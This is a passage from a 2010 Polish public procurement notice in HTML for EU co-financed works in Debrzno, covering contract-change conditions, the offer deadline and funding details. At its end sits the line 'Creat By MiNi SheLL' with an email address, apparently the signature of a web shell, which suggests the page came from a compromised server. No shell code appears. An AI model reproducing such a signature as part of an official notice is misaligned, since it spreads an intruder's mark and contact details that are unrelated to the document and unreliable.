a)Jeżeli Zamawiający dokonał zmiany sposobu wykonania elementu przedmiotu zamówienia, czego nie można było przewidzieć i co nie wynikało z potrzeby wykonania robót i nie można było tego przewidzieć przed zawarciem umowy a co skutkuje zmianą zakresu przedmiotu zamówienia i zmianą terminów jego realizacji,
b)Jeżeli wystąpiła konieczność dokonania zamówień dodatkowych nie ujętych w dokumentacji projektowej lub zamiennych, a koniecznych dla właściwego wykonania i funkcjonowania wybudowanego obiektu,
c)Jeżeli wystąpiła potrzeba wprowadzenia zmian do dokumentacji projektowej czego nie można było przewidzieć przed zawarciem umowy, a co skutkuje zmianą zakresu przedmiotu zamówienia i zmianą terminów jego realizacji,
d)Jeżeli warunki atmosferyczne i geotechniczne nie będą pozwalały na wykonanie przedmiotu umowy ze względów technologicznych, co będzie miało wpływ na jakość wykonanych robót i skutkowało będzie zmianą zakresu i terminu wykonania robot,
e)Jeżeli wystąpią nieprzewidziane okoliczności niezależne od zamawiającego skutkujące zmianą sposobu i terminów realizacji przedmiotu zamówienia,
f)Na skutek działania siły wyższej zaistnieje konieczność zmiany terminu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.debrzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy, 77-310 Debrzno, ul. Traugutta 2 pokój Nr- 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2010 godzina 12:00, miejsce: Urząd Miasta i Gminy, 77-310 Debrzno, ul. Traugutta 2 pokój Nr- 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego  w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com